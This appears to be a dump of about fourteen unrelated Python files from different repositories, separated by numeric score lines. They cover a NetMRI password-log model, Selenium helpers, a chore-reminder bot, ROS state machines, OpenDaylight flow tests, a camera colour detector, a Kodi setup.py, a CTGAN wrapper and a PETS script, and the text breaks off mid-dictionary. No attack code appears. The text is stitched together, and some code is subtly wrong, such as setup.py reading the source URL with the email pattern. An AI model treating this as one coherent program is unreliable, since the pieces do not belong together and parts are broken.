<reponame>IngmarVG-IB/infoblox-netmri from ..remote import RemoteModel from infoblox_netmri.utils.utils import check_api_availability class DevicePasswordLogRemote(RemoteModel): """ This table list out entries of DevicePasswordLog | ``DevicePwLogID:`` The internal NetMRI identifier for the device password log. | ``attribute type:`` number | ``DataSourceID:`` The internal NetMRI identifier for the collector NetMRI that collected this data record. | ``attribute type:`` number | ``DeviceID:`` The internal NetMRI identifier for the device from which device password log table information was collected. | ``attribute type:`` number | ``DevicePwLogTimestamp:`` The date and time this record was collected or calculated. | ``attribute type:`` datetime | ``DevicePwLogProtocol:`` The protocol of the device password log. | ``attribute type:`` string | ``DevicePwLogPassword:`` The password of the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPAuthProto:`` The SNMP password is authenticated for the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPPrivProto:`` The SNMP private password protocol of the device password log. | ``attribute type:`` string | ``DevicePwLogStatus:`` The status of the device password log. | ``attribute type:`` string | ``DevicePwLogPasswordSecure:`` The password of the device password log. | ``attribute type:`` string | ``DevicePwLogUsernameSecure:`` The username of the device password log. | ``attribute type:`` string | ``DevicePwLogEnablePasswordSecure:`` The password is enabled for device password log. | ``attribute type:`` string | ``DevicePwLogSNMPAuthPWSecure:`` The SNMP password is authenticated for the device password log. | ``attribute type:`` string | ``DevicePwLogSNMPPrivPWSecure:`` The SNMP private password of the device password log. | ``attribute type:`` string | ``SecureVersion:`` The encryption version of the username and passwords. 
| ``attribute type:`` number """ properties = ("DevicePwLogID", "DataSourceID", "DeviceID", "DevicePwLogTimestamp", "DevicePwLogProtocol", "DevicePwLogPassword", "DevicePwLogSNMPAuthProto", "DevicePwLogSNMPPrivProto", "DevicePwLogStatus", "DevicePwLogPasswordSecure", "DevicePwLogUsernameSecure", "DevicePwLogEnablePasswordSecure", "DevicePwLogSNMPAuthPWSecure", "DevicePwLogSNMPPrivPWSecure", "SecureVersion", ) @property @check_api_availability def data_source(self): """ The collector NetMRI that collected this data record. ``attribute type:`` model """ return self.broker.data_source(**{"DevicePwLogID": self.DevicePwLogID }) @property @check_api_availability def device(self): """ The device from which this data was collected. ``attribute type:`` model """ return self.broker.device(**{"DevicePwLogID": self.DevicePwLogID }) @property @check_api_availability def infradevice(self): """ The device from which this data was collected. ``attribute type:`` model """ return self.broker.infradevice(**{"DevicePwLogID": self.DevicePwLogID })
2.09375
2
selenium_utils/element.py
defactto/selenium-utils
7
16777
import logging import time from selenium.common import exceptions from selenium.webdriver.remote.webdriver import WebDriver from selenium.webdriver.common import action_chains from selenium.webdriver.support import expected_conditions as EC from selenium.webdriver.support.ui import WebDriverWait from selenium_utils import exception logger = logging.getLogger(__name__) def hover_over_element(driver: WebDriver, element): """Moves the mouse pointer to the element and hovers""" action_chains.ActionChains(driver).move_to_element(element).perform() def wait_until_stops_moving(element, wait_seconds=1): """Waits until the element stops moving Args: selenium.webdriver.remote.webelement.WebElement """ prev_location = None timer_begin = time.time() while prev_location != element.location: prev_location = element.location time.sleep(0.1) if time.time() - timer_begin > wait_seconds: raise exception.ElementMovingTimeout def get_when_visible(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.presence_of_element_located(locator)) def wait_until_condition(driver: WebDriver, condition, wait_seconds=1): """Wait until given expected condition is met""" WebDriverWait( driver, wait_seconds).until(condition) def wait_until_not_present(driver: WebDriver, locator): """Wait until no element(-s) for locator given are present in the DOM.""" wait_until_condition(driver, lambda d: len(d.find_elements(*locator)) == 0) def get_when_all_visible(driver: WebDriver, locator, wait_seconds=1): """Return WebElements by locator when all of them are visible. 
Args: locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElements """ return WebDriverWait( driver, wait_seconds) \ .until(EC.visibility_of_any_elements_located(locator)) def get_when_clickable(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.element_to_be_clickable(locator)) def get_when_invisible(driver: WebDriver, locator, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) Returns: selenium.webdriver.remote.webelement.WebElement """ return WebDriverWait( driver, wait_seconds) \ .until(EC.invisibility_of_element_located(locator)) def wait_for_element_text(driver: WebDriver, locator, text, wait_seconds=1): """ Args: driver (base.CustomDriver) locator (tuple) text (str) """ return WebDriverWait( driver, wait_seconds) \ .until(EC.text_to_be_present_in_element(locator, text)) def is_value_in_attr(element, attr="class", value="active"): """Checks if the attribute value is present for given attribute Args: element (selenium.webdriver.remote.webelement.WebElement) attr (basestring): attribute name e.g. 
"class" value (basestring): value in the class attribute that indicates the element is now active/opened Returns: bool """ attributes = element.get_attribute(attr) return value in attributes.split() def click_on_staleable_element(driver: WebDriver, el_locator, wait_seconds=1): """Clicks an element that can be modified between the time we find it and when we click on it""" time_start = time.time() while time.time() - time_start < wait_seconds: try: driver.find_element(*el_locator).click() break except exceptions.StaleElementReferenceException as e: logger.error(str(e)) time.sleep(0.1) else: raise exception.ElementNotFound(el_locator) def scroll_into_view(driver: WebDriver, element, offset_pixels=0): """Scrolls page to element using JS""" driver.execute_script("return arguments[0].scrollIntoView();", element) # compensate for the header driver.execute_script("window.scrollBy(0, -{});".format(offset_pixels)) return element
2.734375
3
modules/iib_applications.py
satbel/ib-metrics-pyclient
0
16778
<filename>modules/iib_applications.py<gh_stars>0 # -*- coding: utf-8 -*- """Various functions for ib applications.""" from modules.iib_api import get_status def get_metric_name(metric_label): """Returns pushgateway formatted metric name.""" return 'ib_application_{0}'.format(metric_label) def get_metric_annotation(): """Returns dictionary with annotations 'HELP' and 'TYPE' for metrics.""" annotations = { 'status': '# HELP {0} Current status of IB application.\n\ # TYPE {0} gauge\n'.format(get_metric_name('status'))} return annotations def format_applications(applications, broker_name): """Returns string with all metrics for all applications which ready to push to pushgateway.""" metrics_annotation = get_metric_annotation() app_metric_data = str() for app in applications: app_list = app.split() egname, app_name, status = app_list[6], app_list[2], app_list[8].replace(".","") template_string = 'egname="{0}", brokername="{1}", appname="{2}"'.format( egname.replace("'", ""), broker_name, app_name.replace("'", "")) app_metric = '{0}{{{1}}} {2}\n'.format( get_metric_name(metric_label='status'), template_string, get_status(status=status)) app_metric_data += app_metric app_metric_data = '{0}{1}'.format( metrics_annotation['status'], app_metric_data) return app_metric_data
2.25
2
clock.py
hcjk/kitchen-bot
0
16779
import os
import requests
import psycopg2
import db_lib as db
from app import send_message, log
from apscheduler.schedulers.blocking import BlockingScheduler

# One shared connection, reused by every scheduled job.
DATABASE_URL = os.environ['DATABASE_URL']
conn = psycopg2.connect(DATABASE_URL, sslmode='require')


def kitchen_reminder():
    """Advance the two-day kitchen-duty rotation; runs nightly at midnight."""
    # When notifications are disabled, nothing to do.
    if db.getStatus(conn) == "DISABLED":
        log("kitchen_reminder trigger; bot NOTIFY_STATUS is disabled")
        return "ok", 200

    day_number = db.getBoyNum(conn)
    if day_number == 1:
        # First day done -- same person keeps the duty one more day.
        db.changeDay(conn, db.getBoy(conn))
    elif day_number == 2:
        # Second day done -- hand the duty over and notify the newcomer.
        outgoing = db.getBoy(conn)
        incoming = db.getNextBoy(conn)
        db.updateBoy(conn, outgoing, incoming)
        send_message(
            "{}, it is your kitchen day!".format(db.getNickname(conn, incoming)),
            [incoming])
    else:
        log("Error: getBoyNum() returned an unexpected value: {}".format(day_number))
    return "ok", 200


def rent_reminder():
    """Remind everyone to pay rent; runs on the first of each month."""
    send_message("Don't forget to pay rent!", db.getAll(conn))
    return "ok", 200


sched = BlockingScheduler()
sched.add_job(kitchen_reminder, 'cron', hour=0, minute=0)
sched.add_job(rent_reminder, 'cron', day=1)
sched.start()
2.625
3
ucf_sub_catkin_ros/src/sub_states/src/qual/test.py
RoboticsClubatUCF/RoboSub
0
16780
#!/usr/bin/env python
"""Top-level SMACH state machines for the qualification run."""
import rospy
import smach
import gate
import pole


class SubStates:
    """Builds the gate and pole sub-machines and the task machine linking them."""

    def __init__(self):
        rospy.loginfo("State Machine has started.")
        self.gate = smach.StateMachine(outcomes=['preempted', 'POLE', 'GATE'])
        self.pole = smach.StateMachine(outcomes=['preempted', 'GATE', 'POLE'])
        self.tasks = smach.StateMachine(
            outcomes=['POLE', 'GATE', 'preempted', self.gate, self.pole])

        with self.tasks:
            smach.StateMachine.add(
                'Start', self.pole,
                transitions={'POLE': self.pole, 'GATE': self.gate})

        # Gate pipeline: locate -> align -> through; any failure retries LOCATE.
        with self.gate:
            for label, state, on_success in (
                    ('LOCATE', gate.locate(), 'ALIGN'),
                    ('ALIGN', gate.align(), 'THROUGH'),
                    ('THROUGH', gate.through(), 'POLE')):
                smach.StateMachine.add(
                    label, state,
                    transitions={'preempted': 'preempted',
                                 'success': on_success,
                                 'failure': 'LOCATE'})

        # Pole pipeline: locate -> align -> drift; any failure retries LOCATE.
        with self.pole:
            for label, state, on_success in (
                    ('LOCATE', pole.locate(), 'ALIGN'),
                    ('ALIGN', pole.align(), 'DRIFT'),
                    ('DRIFT', pole.drift(), 'GATE')):
                smach.StateMachine.add(
                    label, state,
                    transitions={'preempted': 'preempted',
                                 'success': on_success,
                                 'failure': 'LOCATE'})


if __name__ == '__main__':
    rospy.init_node('hippo_sm')
    sm = SubStates()
    outcome = sm.tasks.execute()
    rospy.spin()
2.34375
2
networkapi/plugins/SDN/ODL/tests/test_send_flows_with_tcp_flags.py
vinicius-marinho/GloboNetworkAPI
73
16781
from networkapi.test.test_case import NetworkApiTestCase
from networkapi.plugins.SDN.ODL.flows.acl import AclFlowBuilder


class TestSendFlowsWithTCPFlags(NetworkApiTestCase):
    """ Class to test flows that have tcp flags on it """

    def _first_flow(self, acl, version):
        """Build *acl* against one ODL release and return its first flow."""
        flows = AclFlowBuilder(acl, environment=0, version=version)
        # next(iterator) works on Python 2 and 3; iterator.next() is
        # Python-2 only and raises AttributeError under Python 3.
        return next(flows.build())

    def _assert_tcp_flag(self, acl, expected):
        """Assert the TCP-flag value produced for every supported release.

        Beryllium uses the singular 'tcp-flag-match'/'tcp-flag' keys while
        Carbon, Boron and Nitrogen use the plural
        'tcp-flags-match'/'tcp-flags' keys.
        """
        # Beryllium
        flow = self._first_flow(acl, 'BERYLLIUM')
        assert flow['flow'][0]['match']['tcp-flag-match']['tcp-flag'] == expected

        # Carbon, Boron, Nitrogen
        for version in ('CARBON', 'BORON', 'NITROGEN'):
            flow = self._first_flow(acl, version)
            assert flow['flow'][0]['match']['tcp-flags-match']['tcp-flags'] == expected

    def test_flow_with_ack_flag(self):
        """ Try to send a flow with ACK flag """
        acl = {
            "kind": "acl_with_tcp_flags",
            "rules": [{
                "action": "permit",
                "description": "ACK access",
                "destination": "10.0.0.0/8",
                "id": "300",
                "l4-options": {
                    "flags": [
                        "ACK"
                    ]
                },
                "owner": "networkapi",
                "protocol": "tcp",
                "source": "0.0.0.0/0"
            }]
        }
        # TCP ACK flag bit == 0b010000 == 16
        self._assert_tcp_flag(acl, 16)

    def test_flow_with_RST_flag(self):
        """ Try to send a flow with RST flag """
        acl = {
            "kind": "acl_with_tcp_flags",
            "rules": [{
                "action": "permit",
                "description": "RST access",
                "destination": "10.0.0.0/8",
                "id": "200",
                "l4-options": {
                    "flags": [
                        "RST"
                    ]
                },
                "owner": "networkapi",
                "protocol": "tcp",
                "source": "0.0.0.0/0"
            }]
        }
        # TCP RST flag bit == 0b000100 == 4
        self._assert_tcp_flag(acl, 4)
2.078125
2
Old/OpenCV Scripts/red_filtered_detector.py
multirotorsociety/SAFMC-19-D2-Autonomous-Drone
6
16782
<reponame>multirotorsociety/SAFMC-19-D2-Autonomous-Drone<filename>Old/OpenCV Scripts/red_filtered_detector.py from picamera.array import PiRGBArray from picamera import PiCamera import cv2 import numpy as np import time from fractions import Fraction from PIL import Image #cap = cv2.VideoCapture(0) camera = PiCamera() camera.resolution = (426, 240) camera.framerate = 24 camera.exposure_mode = 'off' camera.exposure_compensation = -3 camera.drc_strength = 'off' camera.still_stats = False camera.awb_mode = 'off' camera.awb_gains = (Fraction(25, 16), Fraction(25,16)) rawCapture = PiRGBArray(camera, size=(426, 240)) # allow the camera to warmup time.sleep(0.1) # lower = [135, 130, 50] # upper = [180, 200, 255] # lower = [160, 100, 100] # upper = [180, 255, 255] # lower2 = [0, 100, 100] # upper2 = [10, 255, 255] #lower1 = [0, 50, 50] #upper1 = [5, 255, 255] out = cv2.VideoWriter(str(time.time()) + ".avi",cv2.VideoWriter_fourcc('M','J','P','G'), 10, (426, 240)) # lower = np.array(lower, dtype = "uint8") # upper = np.array(upper, dtype = "uint8") # lower2 = np.array(lower2, dtype = "uint8") # upper2 = np.array(upper2, dtype = "uint8") #lower1 = np.array(lower1, dtype = "uint8") #upper1 = np.array(upper1, dtype = "uint8") for img in camera.capture_continuous(rawCapture, format="bgr", use_video_port=True): #print(camera.awb_gains) #r, frame = cap.read() for i in range(5): # Clears the 5 frame buffer frame = img.array height, width = frame.shape[:2] centre = (int(width/2), int(height/2)) #frame = cv2.GaussianBlur(frame, (9, 9), 0) #frame = cv2.medianBlur(frame,3) #frame = cv2.GaussianBlur(frame, (9, 9), 0) #mask = cv2.inRange(frame, lower, upper) #mask2 = cv2.inRange(frame, lower2, upper2) #mask2 = cv2.inRange(frame, lower1, upper1) #mask = mask1 + mask2 #img_rec_red = cv2.bitwise_and(frame, frame, mask = mask) #img_rec_redo = cv2.bitwise_and(frame, frame, mask = mask2) #cv2.imshow("pre or1", img_rec_red) #cv2.imshow("pre or2", img_rec_redo) #img_rec_red = 
cv2.bitwise_or(img_rec_red, img_rec_redo) b_channel = np.array(frame[:,:,0]).astype('float') g_channel = np.array(frame[:,:,1]).astype('float') r_channel = np.array(frame[:,:,2]).astype('float') # #cv2.imshow('b_chan', b_channel) # # cv2.imshow('g_chan', g_channel) # # cv2.imshow('r_chan', r_channel) bgr_channel = np.add((np.add(b_channel, g_channel)), r_channel) img_rec_red2 = np.subtract(r_channel,((b_channel + g_channel)/ 2)) #img_rec_red2 = np.divide(r_channel, 255) img_rec_red2 = np.divide(img_rec_red2,255) #img_rec_red2 = np.square(img_rec_red2) img_rec_red2[img_rec_red2 < 0.3] = 0 img_rec_red2 = img_rec_red2 * 255 img_rec_red2 = np.floor(img_rec_red2).astype('uint8') #img_rec_red = cv2.cvtColor(img_rec_red, cv2.COLOR_BGR2GRAY) #cv2.imshow('recred2', img_rec_red2) ret, th = cv2.threshold(img_rec_red2,10,255,cv2.THRESH_BINARY) #ret, th = cv2.threshold(r_channel.astype('uint8'),110,255,cv2.THRESH_BINARY) #th = cv2.bitwise_not(th, th) kernel = np.ones((5,5),np.uint8) #th = cv2.erode(th, kernel) th = cv2.dilate(th, kernel) th = cv2.GaussianBlur(th, (5,5), 0) try: M = cv2.moments(th) # calculate x,y coordinate of center cX = int(M["m10"] / M["m00"]) cY = int(M["m01"] / M["m00"]) # put text and highlight the center cv2.circle(frame, (cX, cY), 5, (255, 255, 255), -1) #cv2.putText(frame, "centroid", (cX - 25, cY - 25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2) cv2.line(frame, centre, (cX, cY), (255,0,0), 2) dX = cX - centre[0] dY = centre[1] - cY cv2.putText(frame, ("(" + str(dX) + ", " + str(dY) + " )"), (centre[0] - 20, centre[1] - 20), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2) print('Velocities: ' + str(dX) + "," + str(dY)) except: print("No centre detected") #kernel2 = np.ones((15,15),np.uint8) #eroded_th = cv2.erode(dilated_th, kernel2) #blurred_th = cv2.GaussianBlur(eroded_th.copy(), (9, 9), 0) #eroded_th = cv2.bitwise_not(eroded_th,eroded_th) #dilated_th = cv2.bitwise_not(dilated_th, dilated_th) # circles = 
cv2.HoughCircles(th,cv2.HOUGH_GRADIENT, 1,1000, # param1=40,param2=23,minRadius=20,maxRadius=0) # try: # circles = np.uint16(np.around(circles)) # for i in circles[0,:]: # # draw the outer circle # cv2.circle(frame,(i[0],i[1]),i[2],(0,255,0),2) # # draw the center of the circle # cv2.circle(frame,(i[0],i[1]),2,(0,0,255),3) # except: # pass cv2.imshow('original', frame) #cv2.imshow('rec_red',img_rec_red) cv2.imshow('detected circles',th) out.write(frame) k = cv2.waitKey(1) rawCapture.truncate(0) if k == 0xFF & ord("q"): break #cv2.destroyAllWindows() #cap.release() out.release()
2.390625
2
setup.py
Maven85/plugin.video.magenta-sport
0
16783
# -*- coding: utf-8 -*- # Module: default # Author: asciidisco # Created on: 24.07.2017 # License: MIT https://goo.gl/WA1kby """Setup""" from __future__ import unicode_literals from os.path import abspath, dirname, join from re import search from sys import exit, version, version_info from setuptools import find_packages, setup REQUIRED_PYTHON_VERSION = (2, 7) PACKAGES = find_packages() INSTALL_DEPENDENCIES = [] SETUP_DEPENDENCIES = [] TEST_DEPENDENCIES = [ 'nose', 'Kodistubs', 'httpretty', 'mock', ] EXTRA_DEPENDENCIES = { 'dev': [ 'nose', 'flake8', 'codeclimate-test-reporter', 'pylint', 'mccabe', 'pycodestyle', 'pyflakes', 'Kodistubs', 'httpretty', 'mock', 'requests', 'beautifulsoup4', 'pyDes', 'radon', 'Sphinx', 'sphinx_rtd_theme', 'm2r', 'kodi-release-helper', 'dennis', 'blessings', 'demjson', 'restructuredtext_lint', 'yamllint', ] } def get_addon_data(): """Loads the Kodi plugin data from addon.xml""" root_dir = dirname(abspath(__file__)) pathname = join(root_dir, 'addon.xml') with open(pathname, 'rb') as addon_xml: addon_xml_contents = addon_xml.read() _id = search( r'(?<!xml )id="(.+?)"', addon_xml_contents).group(1) author = search( r'(?<!xml )provider-name="(.+?)"', addon_xml_contents).group(1) name = search( r'(?<!xml )name="(.+?)"', addon_xml_contents).group(1) version = search( r'(?<!xml )version="(.+?)"', addon_xml_contents).group(1) desc = search( r'(?<!xml )description lang="en_GB">(.+?)<', addon_xml_contents).group(1) email = search( r'(?<!xml )email>(.+?)<', addon_xml_contents).group(1) source = search( r'(?<!xml )email>(.+?)<', addon_xml_contents).group(1) return { 'id': _id, 'author': author, 'name': name, 'version': version, 'desc': desc, 'email': email, 'source': source, } if version_info < REQUIRED_PYTHON_VERSION: exit('Python >= 2.7 is required. 
Your version:\n{0}'.format(version)) if __name__ == '__main__': ADDON_DATA = get_addon_data() setup( name=ADDON_DATA.get('name'), version=ADDON_DATA.get('version'), author=ADDON_DATA.get('author'), author_email=ADDON_DATA.get('email'), description=ADDON_DATA.get('desc'), packages=PACKAGES, include_package_data=True, install_requires=INSTALL_DEPENDENCIES, setup_requires=SETUP_DEPENDENCIES, tests_require=TEST_DEPENDENCIES, extras_require=EXTRA_DEPENDENCIES, test_suite='nose.collector', )
1.757813
2
franka_lcas_experiments/script/load_model_rtp.py
arsh09/franka_ros_lcas
2
16784
import numpy as np
import os, sys
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
from tensorflow.keras.models import Model
import tensorflow as tf
from PIL import Image
from utils_rtp import ProMP


class Predictor:
    """Predicts a 7-joint trajectory from an input image via ProMP weights."""

    def __init__(self, encoder_model_path, predictor_model_path):
        # Basis matrix used to expand predicted ProMP weights into a trajectory.
        self.all_phi = self.promp_train()
        # Reuse the trained autoencoder up to its bottleneck as the encoder.
        encoder_model = tf.keras.models.load_model(encoder_model_path)
        self.encoder = Model(encoder_model.input,
                             encoder_model.get_layer("bottleneck").output)
        self.exp_model = tf.keras.models.load_model(predictor_model_path,
                                                    compile=False)

    def promp_train(self):
        """Build the block-diagonal ProMP basis matrix for the 7 joints."""
        phi = ProMP().basis_func_gauss_glb()
        pad = np.zeros([phi.shape[0], 8])
        joint_count = 7
        rows = []
        for joint in range(joint_count):
            # phi sits on the block diagonal; zero padding everywhere else.
            blocks = [pad] * joint_count
            blocks[joint] = phi
            rows.append(np.hstack(tuple(blocks)))
        return tf.cast(np.vstack(tuple(rows)), tf.float32)

    def preprocess_image(self, image):
        """Resize a PIL image to the 256x256 network input and return an array."""
        return np.asarray(image.resize((256, 256)))

    def predict(self, image_numpy):
        """Return the joint trajectory predicted for a batched RGB image array."""
        latent = self.encoder.predict(image_numpy / 255)
        weights = self.exp_model.predict(latent)
        return np.matmul(self.all_phi, np.transpose(weights)).squeeze()


if __name__ == "__main__":
    ENCODED_MODEL_PATH = "/home/arshad/Documents/reach_to_palpate_validation_models/encoded_model_regions"
    PREDICTOR_MODEL = "/home/arshad/Documents/reach_to_palpate_validation_models/model_cnn_rgb_1"
    image = np.load("/home/arshad/catkin_ws/image_xy_rtp.npy")
    predictor = Predictor(ENCODED_MODEL_PATH, PREDICTOR_MODEL)
    traj = predictor.predict(image)
    np.save("/home/arshad/catkin_ws/predicted_joints_values_rtp.npy", traj)
    print("\n Predicted ProMPs weights for RTP task. Joint trajectory is saved in the file. \n Press 'p' to display the trajectory...")
2.078125
2
sdv/tabular/ctgan.py
joanvaquer/SDV
0
16785
"""Wrapper around CTGAN model."""

from sdv.tabular.base import BaseTabularModel


class CTGAN(BaseTabularModel):
    """Tabular model backed by the ``CTGANSynthesizer`` implementation.

    Args:
        field_names (list[str]):
            Names of the fields to model; any other field found in the data
            is ignored. When ``None``, every field found in the data is used.
        field_types (dict[str, dict]):
            Data types and subtypes per field, following the SDV Metadata
            Schema.
        field_transformers (dict[str, str]):
            Transformer to use per field. Supported values: ``integer``,
            ``float``, ``categorical``, ``categorical_fuzzy``,
            ``one_hot_encoding``, ``label_encoding``, ``boolean`` and
            ``datetime``.
        anonymize_fields (dict[str, str]):
            Fields to anonymize, mapped to the faker category they belong to.
        primary_key (str):
            Name of the field which is the primary key of the table.
        constraints (list[Constraint, dict]):
            List of Constraint objects or their dict representations.
        table_metadata (dict or metadata.Table):
            Table metadata instance or dict representation. Must not be
            combined with the other metadata-related arguments.
        epochs (int):
            Number of training epochs. Defaults to 300.
        log_frequency (boolean):
            Whether to use log frequency of categorical levels in
            conditional sampling. Defaults to ``True``.
        embedding_dim (int):
            Size of the random sample passed to the Generator.
            Defaults to 128.
        gen_dim (tuple or list of ints):
            Output sizes of the Generator Residual layers, one layer per
            value. Defaults to (256, 256).
        dis_dim (tuple or list of ints):
            Output sizes of the Discriminator Linear layers, one layer per
            value. Defaults to (256, 256).
        l2scale (float):
            Weight decay for the Adam optimizer. Defaults to 1e-6.
        batch_size (int):
            Number of data samples to process in each step.
    """

    _CTGAN_CLASS = None
    _model = None

    # Object-dtype (non-numeric) columns default to label encoding.
    _DTYPE_TRANSFORMERS = {
        'O': 'label_encoding'
    }

    def __init__(self, field_names=None, field_types=None, field_transformers=None,
                 anonymize_fields=None, primary_key=None, constraints=None,
                 table_metadata=None, epochs=300, log_frequency=True,
                 embedding_dim=128, gen_dim=(256, 256), dis_dim=(256, 256),
                 l2scale=1e-6, batch_size=500):
        # NOTE(review): field_transformers is accepted but not forwarded to
        # the base class -- confirm whether that is intentional.
        super().__init__(
            field_names=field_names,
            primary_key=primary_key,
            field_types=field_types,
            anonymize_fields=anonymize_fields,
            constraints=constraints,
            table_metadata=table_metadata
        )
        try:
            # Lazy import keeps the ctgan dependency optional.
            from ctgan import CTGANSynthesizer
            self._CTGAN_CLASS = CTGANSynthesizer
        except ImportError as ie:
            ie.msg += (
                '\n\nIt seems like `ctgan` is not installed.\n'
                'Please install it using:\n\n pip install sdv[ctgan]'
            )
            raise

        self._embedding_dim = embedding_dim
        self._gen_dim = gen_dim
        self._dis_dim = dis_dim
        self._l2scale = l2scale
        self._batch_size = batch_size
        self._epochs = epochs
        self._log_frequency = log_frequency

    def _fit(self, table_data):
        """Fit the model to the table.

        Args:
            table_data (pandas.DataFrame):
                Data to be learned.
        """
        self._model = self._CTGAN_CLASS(
            embedding_dim=self._embedding_dim,
            gen_dim=self._gen_dim,
            dis_dim=self._dis_dim,
            l2scale=self._l2scale,
            batch_size=self._batch_size,
        )
        discrete_columns = []
        for field_name, field_meta in self._metadata.get_fields().items():
            if field_meta['type'] == 'categorical':
                discrete_columns.append(field_name)
        self._model.fit(
            table_data,
            epochs=self._epochs,
            discrete_columns=discrete_columns,
            log_frequency=self._log_frequency,
        )

    def _sample(self, num_rows):
        """Sample the indicated number of rows from the model.

        Args:
            num_rows (int):
                Amount of rows to sample.

        Returns:
            pandas.DataFrame:
                Sampled data.
        """
        return self._model.sample(num_rows)
2.40625
2
cointrader/config.py
3con/cointrader
103
16786
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Configuration handling for cointrader."""
import sys
import os
import logging
import logging.config

if (sys.version_info > (3, 0)):
    # Python 3 code in this block
    import configparser
else:
    # Python 2 code in this block
    import ConfigParser as configparser

# Name of the per-user configuration file, stored in the home directory.
DEFAULT_CONFIG = ".cointrader.ini"


def get_path_to_config():
    """Return the absolute path of the user's cointrader config file."""
    # Fall back to expanduser when HOME is not exported (e.g. some service
    # environments) -- os.getenv would return None and crash os.path.join.
    home = os.getenv("HOME") or os.path.expanduser("~")
    return os.path.join(home, DEFAULT_CONFIG)


class Config(object):
    """Runtime configuration, optionally loaded from an INI file.

    Args:
        configfile: Open file object of an INI file that doubles as the
            logging configuration and contains a ``DEFAULT`` section with
            an ``exchange`` key, plus a section per exchange holding
            ``api_key`` and ``api_secret``. When ``None``, defaults are
            used and no API credentials are available.
    """

    def __init__(self, configfile=None):
        self.verbose = False
        self.market = "poloniex"
        self.api_key = None
        self.api_secret = None
        if configfile:
            # The same file also carries the logging configuration.
            logging.config.fileConfig(configfile.name)
            config = configparser.ConfigParser()
            # ConfigParser.readfp() was deprecated in Python 3.2 and
            # removed in 3.12; prefer read_file() when it exists while
            # keeping the Python 2 fallback.
            if hasattr(config, "read_file"):
                config.read_file(configfile)
            else:
                config.readfp(configfile)
            exchange = config.get("DEFAULT", "exchange")
            self.api_key = config.get(exchange, "api_key")
            self.api_secret = config.get(exchange, "api_secret")

    @property
    def api(self):
        """Return ``(api_key, api_secret)``; raise RuntimeError if unset."""
        if not self.api_key or not self.api_secret:
            raise RuntimeError("API not configured")
        return self.api_key, self.api_secret
2
src/snakeoil/descriptors.py
Arusekk/snakeoil
0
16787
"""Classes implementing the descriptor protocol."""

__all__ = ("classproperty",)


class classproperty:
    """Property-style access at the class level.

    Wraps a single callable that receives the class as its argument, making
    the computed value readable on the class itself as well as on its
    instances — unlike the builtin :py:func:`property`, which only works on
    instances:

    >>> from snakeoil.descriptors import classproperty
    >>> class foo:
    ...
    ...     @classproperty
    ...     def test(cls):
    ...         print("invoked")
    ...         return True
    >>> foo.test
    invoked
    True
    >>> foo().test
    invoked
    True
    """

    def __init__(self, getter):
        self.getter = getter

    def __get__(self, instance, owner):
        # The owner class is always supplied, whether the attribute is
        # looked up on the class or on one of its instances.
        return self.getter(owner)
3.484375
3
playground/pets_dubins.py
pecey/mbrl-lib
0
16788
<gh_stars>0 import matplotlib as mpl import matplotlib.pyplot as plt import numpy as np import torch import omegaconf import mbrl.env.continuous_dubins as dubins_env import mbrl.env.reward_fns as reward_fns import mbrl.env.termination_fns as termination_fns import mbrl.models as models import mbrl.planning as planning import mbrl.util.common as common_util import mbrl.util as util def train_callback(_model, _total_calls, _epoch, tr_loss, val_score, _best_val): train_losses.append(tr_loss) val_scores.append(val_score.mean().item()) # this returns val score per ensemble model def plot_graph(_axs, _frame, _text, _trial, _steps_trial, _all_rewards, force_update=False): if not force_update and (_steps_trial % 10 != 0): return _axs.clear() _axs.set_xlim([0, num_trials + .1]) _axs.set_ylim([0, 200]) _axs.set_xlabel("Trial") _axs.set_ylabel("Trial reward") _axs.plot(_all_rewards, 'bs-') _text.set_text(f"Trial {_trial + 1}: {_steps_trial} steps") if __name__ == "__main__": mpl.rcParams.update({"font.size": 16}) device = 'cuda:0' if torch.cuda.is_available() else 'cpu' noisy = False seed = 0 env = dubins_env.ContinuousDubinsEnv(noisy) env.seed(seed) rng = np.random.default_rng(seed=seed) generator = torch.Generator(device=device) generator.manual_seed(seed) obs_shape = env.observation_space.shape act_shape = env.action_space.shape # This functions allows the model to evaluate the true rewards given an observation reward_fn = reward_fns.continuous_dubins # This function allows the model to know if an observation should make the episode end term_fn = termination_fns.continuous_dubins trial_length = 200 num_trials = 10 ensemble_size = 5 # Everything with "???" indicates an option with a missing value. 
# Our utility functions will fill in these details using the # environment information cfg_dict = { # dynamics model configuration "dynamics_model": { "model": { "_target_": "mbrl.models.GaussianMLP", "device": device, "num_layers": 3, "ensemble_size": ensemble_size, "hid_size": 200, "use_silu": True, "in_size": "???", "out_size": "???", "deterministic": False, "propagation_method": "fixed_model" } }, # options for training the dynamics model "algorithm": { "learned_rewards": False, "target_is_delta": True, "normalize": True, }, # these are experiment specific options "overrides": { "trial_length": trial_length, "num_steps": num_trials * trial_length, "model_batch_size": 32, "validation_ratio": 0.05 } } cfg = omegaconf.OmegaConf.create(cfg_dict) # Create a 1-D dynamics model for this environment dynamics_model = common_util.create_one_dim_tr_model(cfg, obs_shape, act_shape) # Create a gym-like environment to encapsulate the model model_env = models.ModelEnv(env, dynamics_model, term_fn, reward_fn, generator=generator) replay_buffer = common_util.create_replay_buffer(cfg, obs_shape, act_shape, rng=rng) common_util.rollout_agent_trajectories( env, trial_length, # initial exploration steps planning.RandomAgent(env), {}, # keyword arguments to pass to agent.act() replay_buffer=replay_buffer, trial_length=trial_length ) print("# samples stored", replay_buffer.num_stored) agent_cfg = omegaconf.OmegaConf.create({ # this class evaluates many trajectories and picks the best one "_target_": "mbrl.planning.TrajectoryOptimizerAgent", "planning_horizon": 15, "replan_freq": 1, "verbose": False, "action_lb": "???", "action_ub": "???", # this is the optimizer to generate and choose a trajectory "optimizer_cfg": { "_target_": "mbrl.planning.CEMOptimizer", "num_iterations": 5, 